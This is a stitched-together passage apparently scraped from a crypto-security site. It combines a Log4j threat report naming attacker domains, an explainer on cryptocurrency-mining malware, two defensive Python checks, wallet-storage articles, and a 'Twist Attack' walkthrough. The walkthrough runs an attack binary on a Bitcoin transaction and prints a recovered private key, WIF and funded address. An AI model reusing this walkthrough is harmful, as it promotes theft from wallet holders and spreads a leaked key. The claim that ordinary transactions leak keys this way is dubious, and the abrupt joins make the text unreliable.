Microsoft updated its Log4j vulnerability guidance page with details of a China-based ransomware operator (DEV-0401) targeting internet-facing systems and deploying the NightSky ransomware. “As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon,” it wrote.
“DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).” Based on Microsoft’s analysis, attackers were discovered to be using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.

Security 101: The Impact of Cryptocurrency-Mining Malware

The Australian government has just recognized digital currency as a legal payment method. Since July 1, purchases done using digital currencies such as bitcoin are exempt from the country’s Goods and Services Tax to avoid double taxation. As such, traders and investors will not be levied taxes for buying and selling them through legal exchange platforms.

Japan, which legitimized bitcoin as a form of payment last April, already expects more than 20,000 merchants to accept bitcoin payments. Other countries are joining the bandwagon, albeit partially: businesses and some of the public organizations in Switzerland, Norway, and the Netherlands. In a recent study, unique, active users of cryptocurrency wallets are pegged between 2.9 and 5.8 million, most of which are in North America and Europe.

But what does the acceptance and adoption of digital currencies have to do with online threats? A lot, actually. As cryptocurrencies like bitcoin gain real-world traction, so will cybercriminal threats that abuse it. But how, exactly? What does this mean to businesses and everyday users?

What is cryptocurrency?

Cryptocurrency is an encrypted data string that denotes a unit of currency.
It is monitored and organized by a peer-to-peer network also known as a blockchain, which also serves as a secure ledger of transactions, e.g., buying, selling, and transferring. Unlike physical money, cryptocurrencies are decentralized, which means they are not issued by governments or other financial institutions.

Cryptocurrencies are created (and secured) through cryptographic algorithms that are maintained and confirmed in a process called mining, where a network of computers or specialized hardware such as application-specific integrated circuits (ASICs) process and validate the transactions. The process incentivizes the miners who run the network with the cryptocurrency.

Bitcoin isn’t the be-all and end-all

There are actually over 700 cryptocurrencies, but only some are readily traded and even fewer have market capitalization above $100 million. Bitcoin, for instance, was created by Satoshi Nakamoto (pseudonym) and released in 2009 as open-source code. Blockchain technology made it all work, providing a system where data structures (blocks) are broadcasted, validated, and registered in a public, distributed database through a network of communication endpoints (nodes).

While bitcoin is the most famous cryptocurrency, there are other popular alternatives. Ethereum took “smart contracts” up a notch by making the programming languages needed to code them more accessible to developers. Agreements, or conditional/if-then transactions, are written as code and executed (as long as requirements are met) in Ethereum’s blockchain.

Ethereum, however, earned notoriety after a hacker exploited a vulnerability in the Digital Autonomous Organization (DAO) running on Ethereum’s software, siphoning US $50 million worth of ether (Ethereum’s currency). This resulted in the development of Ethereum Classic, based on the original blockchain, and Ethereum, its upgraded version (via a hard fork).

There are also other notable cryptocurrencies: Litecoin, Dogecoin, Monero.
Litecoin is a purportedly technical improvement of Bitcoin that is capable of faster turnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84 million Litecoins—four times as many cryptocurrency units issued by Bitcoin. Monero is notable for its use of ring signatures (a type of digital signature) and CryptoNote application layer protocol to protect the privacy of its transactions—amount, origin, and destination. Dogecoin, which was initially developed for educational or entertainment purposes, was intended for a broader demographic. Capable of generating uncapped dogecoins, it also uses Scrypt to drive the currency along.

Cryptocurrency mining also drew cybercriminal attention

Cryptocurrencies have no borders—anyone can send them anytime anywhere, without delays or additional/hidden charges from intermediaries. Given their nature, they are more secure from fraud and identity theft as cryptocurrencies cannot be counterfeited, and personal information is behind a cryptographic wall.

Unfortunately, the same apparent profitability, convenience, and pseudonymity of cryptocurrencies also made them ideal for cybercriminals, as ransomware operators showed. The increasing popularity of cryptocurrencies coincides with the incidences of malware that infect systems and devices, turning them into armies of cryptocurrency-mining machines.

Cryptocurrency mining is a computationally intensive task that requires significant resources from dedicated processors, graphics cards, and other hardware. While mining does generate money, there are many caveats. The profit is relative to a miner’s investment on the hardware, not to mention the electricity costs to power them.

Cryptocurrencies are mined in blocks; in bitcoin, for instance, each time a certain number of hashes are solved, the number of bitcoins that can be awarded to the miner per block is halved.
Since the bitcoin network is designed to generate the cryptocurrency every 10 minutes, the difficulty of solving another hash is adjusted. And as mining power increases, the resource requirement for mining a new block piles up. Payouts are relatively small and eventually decrease every four years—in 2016, the reward for mining a block was halved to 12.5 BTC (or $32,000 as of July 5, 2017). Consequently, many join forces into pools to make mining more efficient. Profit is divided between the group, depending on how much effort a miner exerted.

Cryptocurrency-mining malware use similar attack vectors

Bad guys turn to using malware to skirt around these challenges. There is, however, a caveat for cybercriminal miners: internet-connected devices and machines, while fast enough to process network data, don’t have extensive number-crunching capabilities. To offset this, cryptocurrency-mining malware are designed to zombify botnets of computers to perform these tasks. Others avoided subtlety altogether—in 2014, Harvard’s supercomputer cluster Odyssey was used to illicitly mine dogecoins. During the same year, a similar incident happened to US agency National Science Foundation’s own supercomputers. In early February 2017, one of the US Federal Reserve’s servers was misused to mine for bitcoins.

Cryptocurrency-mining malware employ the same modus operandi as many other threats—from malware-toting spam emails and downloads from malicious URLs to junkware and potentially unwanted applications (PUAs). In January 2014, a vulnerability in Yahoo!’s Java-based advertisement network was compromised, exposing European end users to malvertisements that delivered a bitcoin-mining malware. A month before it, German law enforcement arrested hackers for purportedly using malware to mine over $954,000 worth of bitcoins.
We’ve seen the emergence of hacking tools and backdoors related to cybercriminal bitcoin mining as early as 2011, and we’ve since seen a variety of cryptocurrency-mining threats that add more capabilities, such as distributed denial-of-service and URL spoofing. Another even tried to masquerade as a component for one of Trend Micro’s products. In 2014, the threat crossed over to Android devices as Kagecoin, capable of mining bitcoin, litecoin, and dogecoin. A remote access Trojan (RAT) njrat/Njw0rm readily shared in the Middle Eastern underground was modified to add bitcoin-mining functionality. The same was done to an old Java RAT that can mine litecoin.

This year’s notable cryptocurrency-mining malware so far are Adylkuzz, CPUMiner/EternalMiner, and Linux.MulDrop.14. All exploit vulnerabilities. Adylkuzz leverages EternalBlue, the same security flaw that WannaCry ransomware used to destructive effect, while CPUMiner/EternalMiner used SambaCry, a vulnerability in interoperability software suite Samba. Linux.MulDrop.14, a Linux Trojan, targets Raspberry Pi devices. These threats infected devices and machines and turned them into monero-mining botnets.

Cryptocurrency-mining malware’s impact makes them a credible threat

Cryptocurrency-mining malware steal the resources of infected machines, significantly affecting their performance and increasing their wear and tear. An infection also involves other costs, like increased power consumption.

But we’ve also found that their impact goes beyond performance issues. From January 1 to June 24, 2017, our sensors detected 4,894 bitcoin miners that triggered over 460,259 bitcoin-mining activities, and found that more than 20% of these miners also triggered web and network-based attacks. We even found intrusion attempts linked to a ransomware’s attack vector.
The most prevalent of these attacks we saw were:

  • Cross-site scripting
  • Exploiting a remote code execution vulnerability in Microsoft’s Internet Information Server (IIS)
  • Brute force and default password logins/attacks
  • Command buffer overflow exploits
  • Hypertext Preprocessor (PHP) arbitrary code injection
  • SQL injection
  • BlackNurse denial of service attack

These malware can threaten the availability, integrity, and security of a network or system, which can potentially result in disruptions to an enterprise’s mission-critical operations. Information theft and system hijacking are also daunting repercussions. These attacks can also be the conduit from which additional malware are delivered.

Internet of Things (IoT) devices are also in the crosshairs of cryptocurrency-mining malware—from digital video recorders (DVRs)/surveillance cameras, set-top boxes, network-attached storage (NAS) devices, and especially routers, given their ubiquity among home and corporate environments. In April 2017, a variant of Mirai surfaced with bitcoin-mining capabilities. Mirai’s notoriety sprung from the havoc it wrought in IoT devices, particularly home routers, using them to knock high-profile sites offline last year. Over the first three quarters of 2016, we detected a bitcoin-mining zombie army made up of Windows systems, home routers, and IP cameras.

From January 1 to June 24, 2017, we also observed different kinds of devices that were mining bitcoin, although our telemetry cannot verify if these activities were authorized. We also saw bitcoin mining activities surge by 40% from 1,800 triggered events daily in February to 3,000 in March, 2017.

While bitcoin mining isn’t inherently illegal (at least in many countries), it can entail a compromise if it doesn’t have the owner’s knowledge and consent.
We found that machines running Windows had the most bitcoin mining activities, but also of note are:

  • Systems on Macintosh OSes, including iOS (iPhone 4 to iPhone 7)
  • Devices run on Ubuntu OS, a derivative of Debian Linux OS
  • Home routers
  • Environment-monitoring devices, used in data centers
  • Android-run smart TVs and mobile devices
  • IP cameras
  • Print servers
  • Gaming consoles

Cryptocurrency-mining malware can make victims a part of the problem

Cryptocurrency-mining malware can impair system performance and risk end users and businesses to information theft, hijacking, and a plethora of other malware. And by turning these machines into zombies, cryptocurrency malware can even inadvertently make its victims part of the problem.

Indeed, their adverse impact to the devices they infect—and ultimately a business’ asset or a user’s data—makes them a credible threat. There is no silver bullet for these malware, but they can be mitigated by following these best practices:

  • Regularly updating your device with the latest patches helps prevent attackers from using vulnerabilities as doorways into the systems
  • Changing or strengthening the device’s default credentials makes the device less prone to unauthorized access
  • Enabling the device’s firewall (for home routers), if available, or deploying intrusion detection and prevention systems to mitigate incursion attempts
  • Taking caution against known attack vectors: socially engineered links, attachments or files from suspicious websites, dubious third-party software/applications, and unsolicited emails

IT/system administrators and information security professionals can also consider application whitelisting or similar security mechanisms that prevent suspicious executables from running or installing. Proactively monitoring network traffic helps better identify red flags that may indicate malware infection.
Applying the principle of least privilege, developing countermeasures against web injections, securing the email gateway, implementing best practices for corporate mobile devices, and cultivating a cybersecurity-aware workforce are part of a defense-in-depth approach to reducing an enterprise’s exposure to these threats. Ultimately, however, the security of internet-connected devices against cryptocurrency-mining malware isn’t just a burden for their users. Original design and equipment manufacturers also play vital roles in securing the ecosystems they run in.

https://cryptodeeptech.ru/blockchain-attack-vectors/

Majority is not Enough: Bitcoin Mining is Vulnerable
https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf

GitHub

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/PNDBjoT83zA

Source: https://cryptodeep.ru/log4j-vulnerability
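The Apache mitigation for CVE-2021-45105 quoted in the December 17 entry of this post (replace Context Lookups in PatternLayout with Thread Context Map patterns) can be checked mechanically. The following Python audit is an added example, not code from the original post or from Apache; the sample configuration, appender names and function names are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Matches ${ctx:key}, $${ctx:key} and the ${ctx:key:-default} form.
# Group 1 is the context key, reused for the %X{key} rewrite.
CTX_LOOKUP = re.compile(r"\${1,2}\{ctx:([^}:]+)(?::-[^}]*)?\}")

# Constructed sample configuration: the Console layout uses Context Lookups,
# the File layout already uses the Thread Context Map pattern (%X).
SAMPLE_CONFIG = """
<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p [$${ctx:loginId}] ${ctx:requestId} %c - %m%n"/>
    </Console>
    <File name="Audit" fileName="logs/audit.log">
      <PatternLayout>
        <Pattern>%d %p [%X{loginId}] %c - %m%n</Pattern>
      </PatternLayout>
    </File>
  </Appenders>
</Configuration>
"""


def layout_patterns(layout):
    """Collect pattern strings from a PatternLayout (attribute or nested element)."""
    patterns = [v for k, v in layout.attrib.items() if k.lower() == "pattern"]
    patterns += [(c.text or "").strip() for c in layout if c.tag.lower() == "pattern"]
    return patterns


def audit_config(config_xml):
    """Return one finding per PatternLayout pattern that contains a Context Lookup."""
    root = ET.fromstring(config_xml)
    # ElementTree has no parent pointers, so build a child -> parent map
    # to report the name of the enclosing appender.
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for element in root.iter():
        if element.tag.lower() != "patternlayout":
            continue
        appender = parent_of.get(element)
        name = appender.get("name", "?") if appender is not None else "?"
        for pattern in layout_patterns(element):
            keys = CTX_LOOKUP.findall(pattern)
            if not keys:
                continue
            findings.append({
                "appender": name,
                "keys": keys,
                "pattern": pattern,
                # Rewrite each lookup to the Thread Context Map pattern.
                "suggested": CTX_LOOKUP.sub(lambda m: "%X{" + m.group(1) + "}", pattern),
            })
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print("appender :", finding["appender"])
        print("lookups  :", ", ".join(finding["keys"]))
        print("current  :", finding["pattern"])
        print("suggested:", finding["suggested"])
```

A lookup written with a default value loses that default in the suggested pattern, so such findings need a manual review before the configuration is changed.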
  4. CRYPTO DEEP TECH

Not long ago, the elliptic package (6.5.4) for standard elliptic curves was vulnerable to various attacks, one of which is the Twist Attack. The cryptographic problem was in the implementation of secp256k1. We know that the Bitcoin cryptocurrency uses secp256k1, and this attack did not pass Bitcoin by: according to vulnerability CVE-2020-28498, the confirming parties of an ECDSA transaction, through certain points on the secp256k1 elliptic curve, transmitted partial values of the private key (simpler subgroups consisting of 5 to 45 bits), which are called sextic twists. This process is so dangerous that it reveals encrypted data after a series of ECC operations is performed.

In this article we will implement the Twist Attack using an example and show how, using certain points on the secp256k1 elliptic curve, we can obtain partial values of the private key and within 5-15 minutes restore a Bitcoin wallet using the “Sagemath pollard rho function: (discrete_log_rho)” and the “Chinese Remainder Theorem”.

https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md

According to a tweet by Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21

The cofactor is 3^2*13^2*3319*22639

E1: 20412485227
E2: 3319, 22639
E3: 109903, 12977017, 383229727
E4: 18979
E6: 10903, 5290657, 10833080827, 22921299619447

prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447

38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031

HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5

E1: y^2 = x^3 + 1
E2: y^2 = x^3 + 2
E3: y^2 = x^3 + 3
E4: y^2 = x^3 + 4
E6: y^2 = x^3 + 6

https://attacksafe.ru/twist-attack-on-bitcoin

y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7.
In the Koblitz curve, 0 = x³ + 0 + 7
b' = -x^3 - ax.

Let's move on to the experimental part:

(Consider a Bitcoin address)

(Now consider the critically vulnerable transactions)

Open [TerminalGoogleColab].

We implement the Twist Attack algorithm using our 18TwistAttack repository

git clone https://github.com/demining/CryptoDeepTools.git
cd CryptoDeepTools/18TwistAttack/
ls

Install all the packages we need

requirements.txt

sudo apt install python2-minimal
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2 get-pip.py
pip2 install -r requirements.txt

Prepare the RawTX for the attack

RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Save it in the file: RawTX.txt

To carry out the attack we will use the “ATTACKSAFE SOFTWARE”

www.attacksafe.ru/software

Access rights:

chmod +x attacksafe

Usage:

./attacksafe -help

  -version: software version
  -list: list of bitcoin attacks
  -tool: indicate the attack
  -gpu: enable gpu
  -time: work timeout
  -server: server mode
  -port: server port
  -open: open file
  -save: save file
  -search: vulnerability search
  -stop: stop at mode
  -max: maximum quantity in mode
  -min: minimum quantity per mode
  -speed: boost speed for mode
  -range: specific range
  -crack: crack mode
  -field: starting field
  -point: starting point
  -inject: injection regimen
  -decode: decoding mode

./attacksafe -version

Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023]

"ATTACKSAFE SOFTWARE" includes all popular attacks on Bitcoin.
Let's list all the attacks:

./attacksafe -list

Choose -tool: twist_attack

To obtain certain secp256k1 points from the vulnerable ECDSA signature transaction, we added the RawTX data to a text document and saved it as the file RawTX.txt

Run -tool twist_attack using the “ATTACKSAFE SOFTWARE”

./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt

We ran this attack from -tool twist_attack and the result was saved to the file SecretPoints.txt

Now, to see the successful result, open the file SecretPoints.txt

cat SecretPoints.txt

Result:

Elliptic Curve Secret Points:

Now let's add the obtained secp256k1 points. To do this, open the Python script: discrete.py

To run the Python script discrete.py, install SageMath

Installation command:

sudo apt-get update
sudo apt-get install -y python3-gmpy2
yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath

Check the SageMath installation with the command:

sage -v

SageMath version 9.0

To solve the discrete logarithm (Pollard's rho algorithm for logarithms), run the Python script: discrete.py

Run command:

sage -python3 discrete.py

Result:

Discrete_log_rho:
5663673254 229 19231 43549 11713353
47161820 13016 6068 1461826 5248038982 9034433903442

PRIVATE KEY: 4843137891892877119728403798088723017104154997204069979961743654961499092503

privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64])

Convert the private key to HEX format

The decimal format of the private key was saved to the file: privkey.txt

Run the Python script: privkey2hex.py

python3 privkey2hex.py
cat privkey2hex.txt

Open the resulting file: privkey2hex.txt

Private key in HEX format:

PrivKey = 0ab51e7092866dadf86165ea0d70beb69086237a0e7f5a123d496d3d98e03617

Open bitaddress and check:

ADDR: 1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq
WIF: KwaXPrvbWF5USy3GCh453UDGWXnBSroiKKtE6ebtmHHxGKaRmVD6
HEX: 0AB51E7092866DADF86165EA0D70BEB69086237A0E7F5A123D496D3D98E03617

https://live.blockcypher.com/btc/address/1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq/

BALANCE: $ 775.77

Source code ATTACKSAFE SOFTWARE

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/S_ZUcM2cD8I

Source: https://cryptodeep.ru/twist-attack

Cryptanalysis
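The points in the post above lie on curves y^2 = x^3 + b with b other than 7 (its E1 to E6 listing), so the defence is to validate every received point against the secp256k1 equation before any scalar multiplication touches it. The following Python check is an added example, not code from the post or from any wallet library; the function names and the small off-curve sample points are constructed for illustration, and the curve constants are the standard secp256k1 parameters.

```python
# secp256k1 domain parameters: y^2 = x^3 + 7 over F_p, cofactor 1.
P = 2**256 - 2**32 - 977
B = 7
GX = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
GY = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8

# Constructed off-curve samples: each satisfies y^2 = x^3 + b for b = 1, 2, 3, 4,
# i.e. the curve shapes the post labels E1, E2, E3 and E4.
OFF_CURVE_SAMPLES = [(2, 3), (P - 1, 1), (1, 2), (0, 2)]


def implied_b(x, y):
    """Constant term b' of the curve y^2 = x^3 + b' that the point (x, y) lies on."""
    return (y * y - x * x * x) % P


def validate_point(x, y):
    """Return (x, y) if it is an affine secp256k1 point, else raise ValueError.

    With cofactor 1, the range check plus the curve equation is the whole
    membership test; there is no small subgroup left on the real curve.
    """
    if not (0 <= x < P and 0 <= y < P):
        raise ValueError("coordinate out of range")
    b = implied_b(x, y)
    if b != B:
        raise ValueError("point lies on y^2 = x^3 + %d, not on secp256k1" % b)
    return (x, y)


def parse_pubkey(data):
    """Parse a SEC1 public key (33 or 65 bytes) and validate it before use."""
    if len(data) == 65 and data[0] == 0x04:
        x = int.from_bytes(data[1:33], "big")
        y = int.from_bytes(data[33:], "big")
        return validate_point(x, y)
    if len(data) == 33 and data[0] in (0x02, 0x03):
        x = int.from_bytes(data[1:], "big")
        if x >= P:
            raise ValueError("coordinate out of range")
        rhs = (pow(x, 3, P) + B) % P
        # p = 3 (mod 4), so a square root, if one exists, is rhs^((p+1)/4).
        y = pow(rhs, (P + 1) // 4, P)
        if y * y % P != rhs:
            # x^3 + 7 is not a square: no secp256k1 point has this x.
            raise ValueError("x is not the abscissa of any secp256k1 point")
        if (y & 1) != (data[0] & 1):
            y = P - y
        return (x, y)
    raise ValueError("unsupported public key encoding")


if __name__ == "__main__":
    print("generator accepted:", validate_point(GX, GY) == (GX, GY))
    for x, y in OFF_CURVE_SAMPLES:
        try:
            validate_point(x, y)
        except ValueError as err:
            print("rejected:", err)
```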
  5. CRYPTO DEEP TECH

In the last article: “Blockchain Attack Vectors & Vulnerabilities to Smart Contracts” we reviewed all known attacks on the blockchain, in this article we will talk about crypto threats again and we will talk about identifying vulnerabilities for Cold wallets, as well as for Hot wallets.

Blockchain is the underlying tech layer made up of a decentralized ledger, and a very secure data structure as there are a lot of distributed nodes that participate in the consensus algorithm. In order to hack the blockchain, hackers should exploit vulnerabilities in a lot of decentralized nodes. The basic security assumption of blockchain is that it is impossible to hack so many nodes to change the state of the blockchain.

If blockchain tech is so secure, how could it be hacked?

The Achilles heel of the technology is the centralized nature of institutional users that manage large amounts of crypto assets (money) for their clients, while the only thing that stays between the money and the hackers is the private key. The private key should be used to sign, on blockchain transactions, the same way that a manual signature could be used to sign traditional checks. If someone steals the institutions’ private key they can create a transaction on their behalf and steal the money. Unlike bank systems – once a hacked transaction is created there is no way to reverse it – the money is literally stolen.

Why is it important to store and safeguard your private key?

Whoever holds the private keys has complete control over the assets associated with that key. Because blockchain transactions are instantaneous and irrevocable, users aim to keep their private key secret. The private key is only generated once, so misplacing a private key effectively renders useless all the crypto assets associated with that address. Although the optimal custody scenario has yet to be defined, it is undisputed that control of the private key is of paramount concern.
In fact, the private key is, in essence, the real asset. Its intrinsic properties and powers mean there is no way to truly safeguard it without exception.

Cold wallets “The vault of institutional custodians” are hardware devices that store Bitcoin or other cryptocurrencies initially, internet isolated, device. In theory, the cold wallet solution is reported to be the most secure way to store cryptocurrency. Some cryptocurrency users prefer to keep their digital assets in a physical “wallet,” most often a device that looks like a USB stick; they can only be accessed by being plugged directly into a computer and require an internet connection in order for a user to access and move their cryptocurrency funds.

There are several popular cold wallets for commercial use such as Trezor, Ledger Nano S and for enterprise and institutional investors some other devices use a combination of:

  • USB
  • Ethernet
  • SD card
  • External thumb drives
  • Dedicated air gapped machine with HSM

Problems associated with the above hardware is usability and to gain access to the crypto asset you need to connect the cold wallet to a computer and therefore it is exposed to the internet. By doing so you are compromising the cold wallet system through the Internet connection, thus exposing it to potential attack vectors and eventually potential cyber theft.

Using cold wallet storage is a necessary security precaution, especially when dealing with large amounts of Bitcoin and other crypto-assets. For example, a cryptocurrency exchange or crypto fund custodian would typically offer instant withdrawals and might be responsible for hundreds of thousands of Bitcoins and other crypto assets. To minimize the ability that hackers could steal the entire reserve in a security breach, the financial services operator would follow a standard protocol, by keeping the majority of the reserve in cold storage, while holding a smaller percentage of the assets available for day to day trade activity.
Essentially they would not store the majority of digital assets’ private keys on their server or any other connected computer. The only amount kept on the server is the minimum required to cover anticipated customer withdrawals.

Methods used to secure private keys for digital assets:

  • Data encryption that protects wallets with a strong password
  • Backups for digital wallets in case of computer crashes or fraud

Cold wallets are not truly secure as, at some point, they need to send funds and by doing so they rely on bi-directional communication and are connected to the internet. This is when they can be compromised and be infected with malicious data and extremely vulnerable to attacks. Therefore all cold wallets become hot wallets dispelling the theory of total security for institutional custodians.

Hot wallets today have an important role as they are capable of providing easy access to funds and processing automatic transactions, however private keys of the hot wallets are stored in a method that requires that they are always connected to the internet. There are different types of hot wallets that take a different approach on how to store private keys. In mathematical perspective, some duplicate private keys between different participants and others divide a private key between the participant. In other words, hot wallets today tackle the security risk by distributing private keys.

The Hot wallets participants maintain control of their private keys, so the cryptocurrency assets in the hot wallet remain under the holder’s control. However, the assets remain vulnerable to hacking, as a malicious person or group which gains access to your computer or smartphone would theoretically also be able to drain your wallet via getting access to the private key.

Hot wallet’s primary advantage is that it can be used for automatic and fast access transactions.
Individuals looking to actually make purchases with their cryptocurrency assets might choose to use a hot wallet, for instance, as the holdings in that wallet can be transferable across the internet and in general, the number of crypto assets is at a high enough value, therefore it is not worth the time and money that hackers would invest to steal. On the other hand, hot wallets are definitely vulnerable to security breaches as they have ongoing access to the internet.

Different types of hot wallets all store the private keys on internet-connected applications:
• Basic Hot wallet – Direct connection of the private key on the Internet
• Multisig Native Wallet – duplicates private keys – you only need to compromise two participants in order to gain access
• Multiparty computation (MPC) – Distributes private key between 2-5 participants

If we look at the Multisig method, even with 2-3 people or entities having to confirm a particular transaction, hacker groups will spend millions on institutional targets and they only require attack vectors for 2 out of 3 in order to compromise the security. Hacker groups are willing to do this as they stand to gain hundreds of millions in stolen crypto assets.

Even the MPC methodology is vulnerable to a variety of attack vectors. With the MPC approach, multiple non-trusting computers can each conduct computation on their own unique fragments of a larger data set to collectively produce a desired common outcome without any one node knowing the details of the others’ fragments. The private key that executes the transaction is then a collectively generated value; the proponents of MPC maintain that at no point is a single computer responsible for an actual key. MPC-based wallets are said to be a better solution than any hardware or multisig wallets in the market. They are mathematically proven to be safer, completely off-chain, providing higher flexibility and are generally ledger agnostic.
Unfortunately, even with the fragments on multiple devices, it is still not an entirely safe solution because sophisticated hackers might be able to linger within a cluster of machines long enough to trace and reconstruct a key. If they manage to compromise one single employee machine or server they will be able to move laterally in the network and compromise other devices which are a part of the signature method. So this can also be proved false as hacker groups are sophisticated enough to find the vulnerabilities in this method and are willing to spend millions to steal billions.

Using the above solutions could essentially prevent a rogue employee from stealing keys on-site, or from a cold-storage facility, or from any hardware device managed entirely by the company. There are MPC wallet providers that try to limit an attacker or a rogue employee from entering a single network and collecting all of the cryptographic information they would need to authorize and sign an illegal transaction; however, this solution is also not 100% secure, and merely mitigating attack vectors is just not an option when billions are at stake.

Why should the industry care?

As of writing this article the total market cap for cryptocurrencies has exceeded $218 billion and is now in the 10th year of existence. In these past 10 years there have been many notable hacks. All institutions with custody of large amounts of crypto assets have a responsibility to their investors to ensure the most robust security options are deployed throughout their enterprise.
Furthermore, the hacks also lead to various other cyber damage:
• Theft of assets – irreversible
• Reputation damage
• Theft of private customer data
• Loss of jobs
• Closing down the business

But that’s a different article…

Although there is a lot of volatility in the market, which in part is driven by FOMO and media hype, it is critical to acknowledge that a major factor is the security of digital assets, and this can affect the value of a cryptocurrency or an exchange asset valuation, fundamentally altering the entire ecosystem.

Key Takeaways:
• A hot wallet is always connected to the internet; hence it’s prone to online attacks – but it’s more convenient for daily use.
• A cold wallet is mostly not connected to the internet; hence, it’s less prone to online attacks – but it’s less convenient for regular use.
• When choosing a wallet, you should consider the security, convenience, fees, supported coins, and insurance factors.

If you are planning to buy digital assets, deciding how and where to store them is not an option, it’s a necessity. Unlike fiat currencies, cryptocurrencies live on the blockchain and require a proper storage platform known as a wallet. These wallets give you access to your crypto holdings through public and private keys. You use a public key to send and receive cryptocurrencies and a private key to confirm transactions and prove ownership of a crypto wallet. You can think of your public key as your bank account number and your private key as your PIN.

The main difference between hot vs. cold wallets is that the former stores private keys online while the latter stores them offline. This article takes a deep dive into the hot and cold wallet debate, considerations when choosing a wallet, and using both hot and cold wallets to manage your crypto portfolio.

What is a Hot Wallet?

A hot wallet is a software wallet that stores public and private keys online. You can access it through your computer or smartphone when connected to the internet.
Hot wallets are more convenient for daily use as you don’t have to plug them in and out to use them – you just need an internet connection. They are also typically free to download and use, complete with a user-friendly interface that makes it easy for anyone to get started. Hot wallets are vulnerable to attacks because they store public and private keys online, which exposes you to risks like phishing and other scams.

Types of Hot Wallets

There are two types of hot wallets – exchange-based, where a user opens an account with a centralized exchange that acts as the custodian of the users’ funds in their care, and non-custodial software hot wallets.

Exchange-Based Wallets

Exchange-based wallets are part of a centralized exchange. Centralized exchanges are custodial institutions that hold the private keys to their users’ addresses. This means that customers of such custodial financial platforms are not in total custody of their assets, as these are deposited into hot and cold wallets held by the institution. Unfortunately, this exposes users to the risk of the exchange engaging in certain activities that result in the loss of customers’ funds, as seen in the case of FTX in November 2022. Moving forward, there is an industry-wide push for more transparency and to hold custodial institutions accountable for their customers’ tokens with the introduction of Proof of Reserves.

While there is an overall drop in centralized exchange activity, exchange-based wallets are still popular, especially with retail investors, as they make it easy for users to buy and sell cryptocurrency with fiat money. Also, in the event you lose your log-in details, access to your wallet can be restored by contacting the exchange’s customer service.

Non-Custodial Software Hot Wallets

Non-custodial software hot wallets can be accessed through mobile, browser or desktop applications. Most of the time, they’re available across all three.
In the case of these hot wallets, users are responsible for their own private keys and have full control over their funds. While this means your funds are safe in the event of a bank run, as they’re not stored in a custodial institution, if you lose your seed phrase, you will no longer be able to access your wallet and the crypto stored within.

What is a Seed Phrase?

A seed phrase is also known as a recovery phrase. This is a random list of 12, 18, or 24 words that can be used as a master key to recover crypto assets on-chain. Seed phrases generate the private key, which in turn is used to generate the public key. Wallet software typically generates a seed phrase, instructing the user to write it down before storing it safely. The seed phrase acts as a master key to unlock the user’s access to their wallet, so it must be stored safely and never online.

When it comes to storing your seed phrase, don’t just write it on a piece of paper, which will fade over time or possibly be destroyed by water and fire. Instead, use crypto steel to record your seed phrase, and make multiple copies as backup. Never store your seed phrase on a password manager or anywhere online or on your devices. That includes not taking a photo of it, or putting it in a Google Doc or note.

Examples of Hot Wallets

MetaMask – Best for Exploring the Ethereum Ecosystem

MetaMask is one of the most popular hot wallets in the crypto space and supports all EVM-compatible tokens. It’s easy to use and is available on desktop and mobile devices. Besides, it has extra in-built features for swapping, sending, and receiving crypto and collecting non-fungible tokens (NFTs) across networks.

Exchange-Based Wallets – Easy Fiat On-Ramp

Exchange-based hot wallets are similar to MetaMask, mostly supporting desktop and mobile devices. Exchange-based wallets connect to most banks to ensure easy onboarding, allowing new crypto users to directly buy crypto using their bank accounts instead of brokers.
You may (or may not) have to open an account with the exchange to use their wallet services. However, as mentioned above, these exchange-based wallets are custodial, which means the exchange essentially holds your private key and your coins, promising you that you’ll be able to withdraw your coins when you want to.

Exodus – Best for Desktop

